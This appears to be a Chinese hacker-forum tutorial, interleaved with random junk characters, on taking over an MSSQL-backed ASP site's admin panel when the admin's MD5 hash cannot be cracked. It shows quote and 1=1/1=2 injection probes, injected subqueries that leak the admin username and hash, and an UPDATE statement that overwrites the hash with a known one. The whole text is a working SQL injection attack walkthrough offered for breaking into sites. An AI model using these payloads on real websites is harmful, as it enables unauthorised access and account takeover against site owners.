经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。: D7 ?$ _6 J* N6 \) ~
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
; }0 D4 p0 ^& z, j0 k1 S1 ^测试如下:
7 e2 A; G1 a) ~1 x0 Bhttp://www.tmdsb.com/news.asp?id=121$ x5 ~( ^9 U# ]* Y
在地址后输入单引号,显示
. ^$ n7 O$ F6 i8 T$ [( z* [$ C) mMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
5 A8 T' `9 w- R* [/ N3 A+ O# j字符串 ’’’ 之前有未闭合的引号: _7 T% }; e5 X- f. \$ s B; E
/news/tmdws.asp,行630 ^! q# c; v" S
说明没有过滤单引号且数据库是MSSQL.$ Y3 c- K( ~0 [; W
and 1=1正常。and 1=2出错。肯定存在注入
. u4 k( V' y- t% G6 d& M接着输入2 h2 w8 Z4 K2 y! b( V' y# G7 T# {
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
) d6 K- l; m, y9 h得到帐号为:admin
# c& D9 x p5 `0 r" @6 Ehttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)3 K1 g. M t" r5 l' S
得到密码为:a4716077c2ba075c
6 A1 l) A, C8 h0 J! j( N接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
; k) y% [; |. P6 J8 b命令如下 :
) C3 m/ C" A S1 B; X1 _;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
, P$ N1 H4 w* k这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |